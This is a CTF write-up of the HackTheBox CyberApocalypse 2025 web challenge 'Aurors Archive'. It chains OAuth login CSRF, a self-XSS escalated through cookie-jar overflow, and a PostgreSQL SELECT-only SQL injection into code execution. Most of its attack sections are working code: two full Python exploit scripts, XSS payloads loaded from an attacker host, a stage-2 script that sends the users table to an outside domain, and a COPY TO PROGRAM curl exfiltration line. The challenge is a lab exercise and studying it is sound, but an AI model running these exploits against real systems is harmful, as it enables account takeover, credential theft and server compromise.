HackTheBox - CyberApocalypse 2025 Aurors Archive

28/03/2025 - 8 minutes

2025 CSRF OAuth PostgreSQL RCE SQLi XSS cookie-overflow ctfs hacking htb-cyberapocalypse web
  1. 1 Intro
  2. 2 Recon
    1. 2.1 Application setup
    2. 2.2 Basic functionality
      1. 2.2.1 Login
      2. 2.2.2 Main application
        1. 2.2.2.1 My Submissions
        2. 2.2.2.2 Making a submission
    3. 2.3 Code review
      1. 2.3.1 Admin bot
      2. 2.3.2 OAuth service
      3. 2.3.3 Admin panel
    4. 2.4 Vulnerability discovery and exploitation
      1. 2.4.1 SQLi
      2. 2.4.2 XSS
      3. 2.4.3 OAuth
      4. 2.4.4 Chaining everything together
        1. 2.4.4.1 OAuth
        2. 2.4.4.2 XSS
  3. 3 1-Click RCE exploit video

# Intro

Aurors Archive is a web challenge from the HTB CyberApocalypse 2025 CTF. I really enjoyed solving this one with the rest of the team; for this CTF we played as Thread In The Needle X CyberMouflons. The challenge required a lot of code review and the chaining of several different vulnerabilities. Even though that made it a really hard challenge to solve, the truth is that out there in the wild you usually need to combine and chain vulnerabilities to make any real impact (ethically, of course)! The chain involved forced OAuth account linking, XSS, SQLi, and finally RCE to read the flag.

After reading other teams' writeups, including the official HackTheBox one, it seems we were one of the only teams to solve the challenge via something very close to the intended path, everything except the CSTI part. It is always nice to see unintended solutions that slipped even past the author's eyes.

# Recon

# Application setup

The supervisord configuration reveals the application structure:

[supervisord]
user=root
nodaemon=true
stderr_logfile=/dev/null
stdout_logfile=/dev/null

[program:postgres]
command=postgres -D /var/lib/postgresql/data
autostart=true
user=postgres
autorestart=true
stderr_logfile=/dev/null
stdout_logfile=/dev/null

[program:oauth]
command=node index.js
directory=/OAuthServer
autostart=true
autorestart=true
stderr_logfile=/dev/null
stdout_logfile=/dev/null

[program:nodeapp]
command=node index.js
directory=/app
autostart=true
autorestart=true
stderr_logfile=/dev/stderr
stdout_logfile=/dev/stdout

[program:nginx]
command=nginx -g 'daemon off;'
directory=/app
autostart=true
autorestart=true
stderr_logfile=/dev/null
stdout_logfile=/dev/null

This application is made up of four main components, all managed by supervisord: a PostgreSQL database, a custom OAuth service, the main Node.js application, and nginx in front.

Dockerfile

# Add readflag binary
COPY config/readflag.c /
RUN gcc -o /readflag /readflag.c -Wimplicit-function-declaration && chmod 4755 /readflag && rm /readflag.c

# Copy flag
COPY flag.txt /root/flag

The flag is copied to /root/flag and can only be read through the setuid /readflag binary, so our end goal is RCE.

# Basic functionality

# Login

In order to log in to the application we are met with two options: either log in with a username and password, or log in with OAuth. We can't log in directly since we don't have any credentials, so let's click the OAuth option.

Luckily, the OAuth page offers a Register link, so let's click it. After registering and logging in with our newly created account, we are met with a classic OAuth authorization page.

# Main application

This application seems to represent some kind of auction house. From the navbar we can immediately see that a user has the option to place a resource for auction, submit bids, and view auction submissions.

# My Submissions

Here we can see that we have the option to view our submissions. Let's try to place a submission.

# Making a submission

We can make submissions, each of which requires a name, description, URL, and category.

# Code review

# Admin bot

This bot mimics the actions of an administrator and is fed the URLs of user submissions to visit (bot.js):

const browser = await puppeteer.launch({
    headless: true,
    args: [
      '--no-sandbox',
      '--disable-popup-blocking',
      '--disable-background-networking',
      '--disable-default-apps',
      '--disable-extensions',
      '--disable-gpu',
      '--disable-sync',
      '--disable-translate',
      '--hide-scrollbars',
      '--metrics-recording-only',
      '--mute-audio',
      '--no-first-run',
      '--safebrowsing-disable-auto-update',
      '--js-flags=--noexpose_wasm,--jitless'
    ],
    userDataDir: USER_DATA_DIR,
  });

const adminPassword = process.env.ADMIN_PASSWORD;
if (!adminPassword) {
  throw new Error("Admin password not set in environment variables.");
}

await page.goto("http://127.0.0.1:1337/");
console.log(await browser.cookies());
if (page.url() != "http://127.0.0.1:1337/") {
  console.log("loggingin IN");
  await page.type('input[name="username"]', "admin");
  await page.type('input[name="password"]', adminPassword);

  await Promise.all([
	page.click('button[type="submit"]'),
	page.waitForNavigation({ waitUntil: "networkidle0" }),
  ]);
  console.log(await browser.cookies());

} else {
  console.log("already logged in")
  console.log(await page.url());
}

Something that stands out is the persistent USER_DATA_DIR directory, which makes cookies persistent across bot runs.

In addition, we can see that the bot will log in with the admin's credentials unless it is already logged in. To trigger the login action, one must send the bot to the URL http://127.0.0.1:1337/.

The bot is triggered in the background whenever a new submission is created, in routes/api.js:

router.post("/submissions", isAuthenticated, async (req, res) => {
	try {
		const userId = req.session.userId;
		const { name, description, url, category } = req.body;
		const newSubmission = await createSubmission({
			name,
			description,
			url,
			category,
			userId,
		});

		res.status(201).json({ success: true, submission: newSubmission });

		setImmediate(async () => {
			try {
				console.log(`Processing URL in the background: ${url}`);
				await processURLWithBot(url);
			} catch (botError) {
				console.error("Bot encountered an error:", botError);
			}
		});
	} catch (err) {
		console.error("Error creating submission:", err);
		const message =
			err.message.includes("required") ||
			err.message.includes("Invalid URL")
				? err.message
				: "Internal server error.";
		return res.status(500).json({ success: false, message });
	}
});

# OAuth service

The author of the challenge decided to make a custom implementation of the OAuth flow, something we should pay particular attention to, as custom implementations of such complex systems tend to be error-prone.

The typical login flow looks something like below.

GET /oauth/authorize?response_type=code&client_id=doMq8wuSLDbhEAxzbV7lQd8nVECC3ALVL4GYNkGYF0&redirect_uri=%2Fcallback&scope=read HTTP/1.1
Host: 127.0.0.1:1337

The above request is made by the user, requesting to be granted read access by the OAuth service.

POST /oauth/authorize HTTP/1.1
Host: 127.0.0.1:1337
Content-Length: 127

response_type=code&client_id=doMq8wuSLDbhEAxzbV7lQd8nVECC3ALVL4GYNkGYF0&redirect_uri=%2Fcallback&scope=read&state=&approve=true

Once the user approves the requested permissions and follows the callback endpoint with the code returned by the OAuth service, they are logged into the application.

# Admin panel

// Serve Admin Panel UI
router.get("/admin", isAdmin, (req, res) => {
  res.render("admin.html", { title: "Admin Panel" });
});

// Endpoint: Get list of tables (PostgreSQL version)
router.get("/tables", isAdmin, async (req, res) => {
  try {
    // PostgreSQL query to list tables in the 'public' schema
    const tables = await runReadOnlyQuery(`
      SELECT table_name
      FROM information_schema.tables
      WHERE table_schema = 'public'
        AND table_type = 'BASE TABLE'
      ORDER BY table_name;
    `);
    res.json({ success: true, tables });
  } catch (error) {
    console.error("Fetching Tables Error:", error);
    res
      .status(500)
      .json({ success: false, message: "Error fetching tables" });
  }
});

// New Endpoint: Get all records from a specified table (POST version)
router.post("/table", isAdmin, async (req, res) => {
  const { tableName } = req.body;
  try {
    const query = `SELECT * FROM "${tableName}"`;

    if (query.includes(';')) {
      return res
        .status(400)
        .json({ success: false, message: "Multiple queries not allowed!" });
    }

    const results = await runReadOnlyQuery(query);
    res.json({ success: true, results });
  } catch (error) {
    console.error("Table Query Error:", error);
    res.status(500).json({
      success: false,
      message: "Error fetching table data.",
    });
  }
});

The admin panel is short and sweet: it lets an administrator list the database tables and dump the contents of any table. Notice that tableName is interpolated directly into the query string.

# Vulnerability discovery and exploitation

Working backwards, since we know our end goal is RCE, we need to find an attack vector that could lead us there. The most obvious candidate is the SQL injection in the admin panel's /table endpoint, where tableName is concatenated straight into the query. That also makes sense thematically, as this functionality is only unlocked once someone becomes the admin.
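Once we eventually have an admin session, the injection can be exercised with a UNION-based payload. A minimal sketch of such a probe against /table (the three-column shape is an assumption mirroring the users table shape used by the final exploit):

// hypothetical probe, run from an admin session on the app origin;
// the double quote closes the quoted identifier and the UNION appends our own SELECT
fetch("/table", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ tableName: `users" UNION SELECT 1, 'a', version() --` }),
})
  .then((res) => res.json())
  .then(console.log);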

# SQLi

Using the working-backwards approach, we start by trying to escalate the SQLi into PostgreSQL RCE. Visiting our good friend HackTricks, we see that there is a won't-fix issue present since PostgreSQL 9.3, where superusers (and, in newer versions, members of pg_execute_server_program) can abuse COPY ... TO PROGRAM to execute shell commands.

'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -

Wonderful! But let's not get ahead of ourselves: the above requires stacked queries, which we don't have. After attempting multiple bypasses, e.g. trying to fit it into a UNION SELECT or passing the ; in other encodings to trick the check, we can't get it to work, so back to the drawing board.

Eventually we stumble upon a technique for PostgreSQL SELECT-only RCE. The title sounds quite promising, since we seem to be limited to SELECT queries. Quoting the summarized procedure from the article:

read the current config
1. get all loaded config files
SELECT sourcefile FROM pg_file_settings; 
2. read the config file into the pg_largeobject with a chosen id, e.g. 31337
SELECT lo_import('/path/to/config...', 31337);  
3. get contents of the pg_largeobject with id from the previous query
SELECT lo_get(31337); 

modify the current config
1. Decode new config from base64 and store it in a pg_largeobject with a chosen id, e.g. 133337
SELECT lo_from_bytea(133337, decode('IyAtIENv...ZC5zbyc=', 'base64'));
2. Write pg_largeobject with the id from the previous query on a disk to an original config's path
SELECT lo_export(133337, '/path/to/config...');

compile and upload malicious .so lib
1. Get the current PostgreSQL version
SELECT version()
2. Upload first .so library chunk in the pg_largeobject with a chosen id, e.g. 133338
SELECT lo_from_bytea(133338, decode('f0VMRgIBAQ...AAA=', 'base64'));
3..n. Upload next .so library chunks into the pg_largeobject with id from the previous query
SELECT lo_put(133338, 2048*n, decode('AAAAAA...AAAA=', 'base64'));
n+1. Write the .so library into the path, specified in the overwritten config
SELECT lo_export(133338, '/tmp/payload.so')

reload the config
1. Trigger the built-in pg_reload_conf(), available to admins
SELECT pg_reload_conf()

The above steps can be implemented in Python as shown below. The malicious library code is the same as the one referenced in the article.

import requests
import base64
import json
import os
import time
import random

# URL = 'http://127.0.0.1:1337'
URL = 'http://94.237.55.91:43684'

s = requests.Session()
username = 'admin'
password = 'NvRHirF4rdE9sS+GnAI0jqMYUmxlha5tiTgBhhRg0CQ='
r = s.post(f"{URL}/api/login", json={"username": username, "password": password})
print(r.json())

def sqli(payload:str):
    data = {"tableName": f"users\" UNION {payload} --"}
    r = s.post(f"{URL}/table", json=data)
    return r.json()

config_file = "/var/lib/postgresql/data/postgresql.conf"
config_id = random.randint(1, 1000000)
print(config_file)
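# read the current config: import postgresql.conf into a large object (id 31337) and dump its contents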

print(sqli(f"SELECT 1, 'a', lo_import('{config_file}', 31337)::text"))

print(sqli("SELECT 1, 'a', lo_get(31337)"))

with open('postgresql.conf', 'r') as f:
    payload = f.read()
    payload_b64 = base64.b64encode(payload.encode()).decode()
    print(sqli(f"SELECT 1, 'a', lo_from_bytea({config_id}, decode('{payload_b64}', 'base64'))::text"))
    print(sqli(f"SELECT 1, 'a', lo_export({config_id}, '{config_file}')::text"))


lib_id = random.randint(1, 1000000)
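# compile the malicious .so inside a local copy of the challenge container so it matches the target's PostgreSQL build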
os.system("docker cp payload.c web_aurorus_archive:/tmp/payload.c")
os.system("docker cp compile.sh web_aurorus_archive:/tmp/compile.sh")
os.system("docker exec web_aurorus_archive sh /tmp/compile.sh")
os.system("docker cp web_aurorus_archive:/tmp/payload_compiled.so payload.so")

chunk_size = 2048

first_chunk = True
with open('payload.so', 'rb') as f:
    index = 0
    while True:
        chunk = f.read(chunk_size)
        payload_b64 = base64.b64encode(chunk).decode()
        if not chunk:
            break
        if first_chunk:
            print(sqli(f"SELECT 1, 'a', lo_from_bytea({lib_id}, decode('{payload_b64}', 'base64'))::text"))
            first_chunk = False
        else:
            print(sqli(f"SELECT 1, 'a', lo_put({lib_id}, {chunk_size*index} , decode('{payload_b64}', 'base64'))::text"))
        index += 1

print(sqli(f"SELECT 1, 'a', lo_export({lib_id}, '/tmp/payload.so')::text"))
print(sqli("SELECT 1, 'a', pg_reload_conf()::text"))
time.sleep(10)
print(sqli("SELECT 1, 'a', pg_reload_conf()::text"))

Some notes:

  1. The UNION payloads select three columns (1, 'a', and the payload expression) so that they line up with the columns of the users table targeted by the original query.
  2. The malicious library is compiled inside a local copy of the challenge container (web_aurorus_archive) so that it matches the target's PostgreSQL build, then copied out and uploaded in 2048-byte chunks.
  3. pg_reload_conf() is called twice, with a sleep in between, to give the server time to pick up the new configuration.

Alright, we have now achieved SQLi -> RCE. Next, we need to become the admin in order to reach the /table endpoint in the first place.

# XSS

In order to become the admin we must obtain the admin's credentials, which can easily be done via the tables view in the admin panel: simply requesting the users table returns the admin password in plaintext (this is exactly what our stage-2 XSS payload will do later).

Hunting through the source code, we come across the following line in my_submissions.html:

<div id="submissions-data" data-submissions='{{ submissions | dump | safe }}'></div>

The submissions variable is passed through the safe filter. But the question becomes: is it really safe?

By submitting a submission that escapes the data-submissions attribute, we can gain XSS.

A payload like below:

asd'}]'><script src='https://attacker-url/xpl.js'></script>

would execute arbitrary JavaScript in the browser of whoever visits the my-submissions page. However, there is a small issue: as the page name suggests, these are MY submissions, so only the creator of a submission can see it, which downgrades the vulnerability to self-XSS. We parked this finding for now and explored the rest of the application source code with it in mind.
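To see why safe is the culprit, here is a minimal standalone reproduction. It assumes the app renders its templates with Nunjucks, whose built-in dump and safe filters match the syntax above:

const nunjucks = require("nunjucks");

// render the same template snippet with autoescaping enabled, as the app would
const env = new nunjucks.Environment(null, { autoescape: true });

const submissions = [
  { name: "asd'}]'><script src='https://attacker-url/xpl.js'></script>" },
];

const html = env.renderString(
  `<div id="submissions-data" data-submissions='{{ submissions | dump | safe }}'></div>`,
  { submissions }
);

// `dump` JSON-encodes the array, but `safe` disables autoescaping, so the single
// quote inside our name closes the data-submissions attribute and the <script>
// tag becomes real markup
console.log(html);

Dropping the safe filter would leave autoescaping in place and turn the breakout quote into &#39;, which is why the filter is the root cause here.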

# OAuth

Looking through the login flow, we found that the final request

GET /callback?code=81bc9d050342ee67f2cd1d76735c535e1ec5a166 HTTP/1.1
Host: 127.0.0.1:1337

links the currently logged-in application user to the OAuth account. Since no state parameter is validated during this linking step, we can abuse it as a login CSRF: by getting the admin to visit our callback URL (via a submission), the admin's session gets linked to, and effectively logged in as, our attacker account. Since the admin now browses as the attacker, they can see our submissions, which escalates our self-XSS into XSS against the admin.

# Chaining everything together

# OAuth

The steps to link our account to the admin's account are the following:

  1. Register a new account on the OAuth service and log in to the application with it.
  2. POST to /oauth/authorize with approve=true and grab the authorization code from the Location header of the redirect.
  3. Submit http://127.0.0.1:1337/callback?code=<our code> as a submission URL, so the admin bot visits it and its session gets linked to our account (as sketched below).
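A rough sketch of that last step, sent from our own authenticated session (the code value is a placeholder; the full Python script at the end automates the whole chain):

// submit our callback URL so the admin bot opens it with its own session;
// <our-authorization-code> is whatever /oauth/authorize returned to us
fetch("/api/submissions", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    name: "link",
    description: "force-link the admin session to our OAuth account",
    url: "http://127.0.0.1:1337/callback?code=<our-authorization-code>",
    category: "lore",
  }),
});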

# XSS

We can now serve our self-XSS to the admin, since they are now able to see our submissions. However, there is a small issue: by linking the attacker and admin accounts, we essentially lose the admin functionality. A cool trick can be used here to get the best of both worlds. By planting a session cookie with a path attribute, we can keep the admin logged in as admin on every endpoint except the my-submissions page: for requests under that path, a cookie scoped with a more specific path attribute is sent before other cookies of the same name, so the server picks it up first. The remaining problem is that once the admin session has been downgraded (to the attacker user), the bot will never log in as admin again.

await page.goto("http://127.0.0.1:1337/");
    console.log(await browser.cookies());
    if (page.url() != "http://127.0.0.1:1337/") {
      console.log("loggingin IN");

Essentially, the only way for the bot to log in as admin is for it to be redirected to /login after visiting the application, and that won't happen while it still carries its previous, downgraded session (the cookie originally came from the admin logging in, but the session behind it now points to the attacker user). To bypass this restriction, we employ yet another technique: cookie overflowing. From our XSS we overflow the browser's cookie jar, which evicts the old admin cookie (even though it is HttpOnly), and then plant our attacker cookie scoped to path=/my-submissions. Since that cookie does not cover /, the bot gets redirected to /login on its next visit and logs in as admin again. The bot ends up with two cookies: it is admin on the whole application except /my-submissions, where it is still the attacker and can see our submissions.
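In plain JavaScript, the stage-1 payload embedded in the exploit script below boils down to this (ATTACKER_SID is a placeholder for our own connect.sid value):

const ATTACKER_SID = "<our own connect.sid>"; // placeholder, filled in by the exploit script

// 1. overflow the per-domain cookie jar so the admin's old HttpOnly session cookie gets evicted
const cookie_jar_size = 300;
for (let i = 0; i < cookie_jar_size; i++) {
  document.cookie = `cookie${i}=A;`;
}

// 2. expire the filler cookies again so they don't get in the way
for (let i = 0; i < cookie_jar_size; i++) {
  document.cookie = `cookie${i}=A; expires=Thu, 01 Jan 1970 00:00:00 UTC;`;
}

// 3. plant our session cookie scoped to /my-submissions only: the bot stays
//    "logged out" everywhere else, so it re-authenticates as admin on its next run
document.cookie = `connect.sid=${ATTACKER_SID}; path=/my-submissions; expires=Thu, 01 Jan 2026 00:00:00 UTC;`;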

This lets us then serve a stage-2 payload through our (now escalated) XSS that exfiltrates the users table, and with it the admin password.

An automated script for the whole exploitation chain described above can be found below. It is (almost) 1-click RCE: you still have to input the exfiltrated password manually.

import base64
import json
import os
import random
import string
import time

import requests
from requestrepo import Requestrepo

URL = "http://127.0.0.1:1337"
URL = "http://94.237.57.230:32083"

DEBUG = True
DELAY = 7

client = Requestrepo(
    token="",
    host="requestrepo.com",
    port=80,
    protocol="http",
)
print(client.domain)


def debug():
    if DEBUG:
        input("Execute? >")


def submit_resource(name="name", url="https://example.com"):
    xss_payload_data = {
        "name": name,
        "description": "asd",
        "url": url,
        "category": "lore",
    }
    s.post(f"{URL}/api/submissions", json=xss_payload_data)


random_username = "".join(random.choices(string.ascii_letters + string.digits, k=8))
reg_data = {"username": random_username, "password": random_username}

s = requests.Session()

print(f"Registering account: {random_username}")
debug()
s.post(f"{URL}/oauth/register", data=reg_data)

print("Getting OAuth client id...")
debug()
r = s.get(f"{URL}/api/config")
r = json.loads(r.text)
oauthClientId = r["oauthClientId"]
print(f"Got client ID: {oauthClientId}")

print("Creating a callback code")
debug()
auth_data = {
    "response_type": "code",
    "client_id": oauthClientId,
    "redirect_uri": "/callback",
    "scope": "read",
    "state": "",
    "approve": "true",
}
r = s.post(f"{URL}/oauth/authorize", data=auth_data, allow_redirects=False)
callback_code = r.headers["Location"].split("code=")[1]
print(f"user callback code: {callback_code}")

print("Authorizing user account")
debug()
# Auth with the callback code
s.get(f"{URL}/callback?code={callback_code}")

print("Loggging in as user")
debug()

login_data = {"code": callback_code}
r = s.post(f"{URL}/api/oauthLogin", json=login_data)
user_cookie = r.cookies.get("connect.sid")
print(f"User cookie: {user_cookie}")

# STAGE 1
print("Setting up stage 1")
stage1 = (
    """const cookie_jar_size = 300;

for (let i = 0; i < cookie_jar_size; i++) {
    document.cookie = 'cookie'+i+'=A;';
}

for(let i = 0; i < cookie_jar_size; i++) {
    document.cookie = `cookie${i}=A; expires=Thu, 01 Jan 1970 00:00:00 UTC;`;
}

document.cookie = 'connect.sid="""
    + f"{user_cookie}; path=/my-submissions; expires=Thu, 01 Jan 2026 00:00:00 UTC;'"
)
client.update_http(
    raw=stage1.encode(), headers={"Content-Type": "application/javascript"}
)
xss_payload = "asd'}]'>" + f"<script src='http://{client.domain}/a.js'></script>"

print("Submitting XSS Payload to user account...")
debug()
submit_resource(name=xss_payload)
time.sleep(DELAY)

print("Linking admin account with user account")
debug()

submit_resource(url=f"http://127.0.0.1:1337/callback?code={callback_code}")
time.sleep(DELAY)

print("Admin is visiting the XSS payload...")
debug()
submit_resource(url="http://127.0.0.1:1337/my-submissions")
time.sleep(DELAY)

print("Updating to stage 2")
# STAGE 2
stage2 = (
    """
fetch("/table", {
	method: "POST",
	headers: { "Content-Type": "application/json" },
	body: JSON.stringify({ tableName: "users" }),
})
	.then((res) => res.json())
	.then((res) =>
		fetch(
"""
    + f"""
			`http://{client.domain}?password=`.concat(
				JSON.stringify(res)
			)
		)
	);
"""
)
client.update_http(
    raw=stage2.encode(), headers={"Content-Type": "application/javascript"}
)

print(
    "Admin is visiting the XSS payload (with their credentials) HE WILL LOGIN AGAIN..."
)
debug()
submit_resource(url="http://127.0.0.1:1337/my-submissions")

admin_password = input("Admin password: ")

print("Getting RCE baby!!!")
debug()

s = requests.Session()
username = "admin"
r = s.post(f"{URL}/api/login", json={"username": username, "password": admin_password})
print(r.json())


def sqli(payload: str):
    data = {"tableName": f'users" UNION {payload} --'}
    r = s.post(f"{URL}/table", json=data)
    return r.json()
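# from here on, this is the same SELECT-only RCE procedure as in the standalone script above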


config_file = "/var/lib/postgresql/data/postgresql.conf"
config_id = random.randint(1, 1000000)
print(config_file)

print(sqli(f"SELECT 1, 'a', lo_import('{config_file}', 31337)::text"))
print(sqli("SELECT 1, 'a', lo_get(31337)"))

with open("postgresql.conf", "r") as f:
    payload = f.read()
    payload_b64 = base64.b64encode(payload.encode()).decode()
    print(
        sqli(
            f"SELECT 1, 'a', lo_from_bytea({config_id}, decode('{payload_b64}', 'base64'))::text"
        )
    )
    print(sqli(f"SELECT 1, 'a', lo_export({config_id}, '{config_file}')::text"))


lib_id = random.randint(1, 1000000)
os.system("docker cp payload.c web_aurorus_archive:/tmp/payload.c")
os.system("docker cp compile.sh web_aurorus_archive:/tmp/compile.sh")
os.system("docker exec web_aurorus_archive sh /tmp/compile.sh")
os.system("docker cp web_aurorus_archive:/tmp/payload_compiled.so payload.so")

chunk_size = 2048

first_chunk = True
with open("payload.so", "rb") as f:
    index = 0
    while True:
        chunk = f.read(chunk_size)
        payload_b64 = base64.b64encode(chunk).decode()
        if not chunk:
            break
        if first_chunk:
            print(
                sqli(
                    f"SELECT 1, 'a', lo_from_bytea({lib_id}, decode('{payload_b64}', 'base64'))::text"
                )
            )
            first_chunk = False
        else:
            print(
                sqli(
                    f"SELECT 1, 'a', lo_put({lib_id}, {chunk_size * index} , decode('{payload_b64}', 'base64'))::text"
                )
            )
        index += 1

print(sqli(f"SELECT 1, 'a', lo_export({lib_id}, '/tmp/payload.so')::text"))
print(sqli("SELECT 1, 'a', pg_reload_conf()::text"))
time.sleep(DELAY * 2)
print(sqli("SELECT 1, 'a', pg_reload_conf()::text"))

# 1-Click RCE exploit video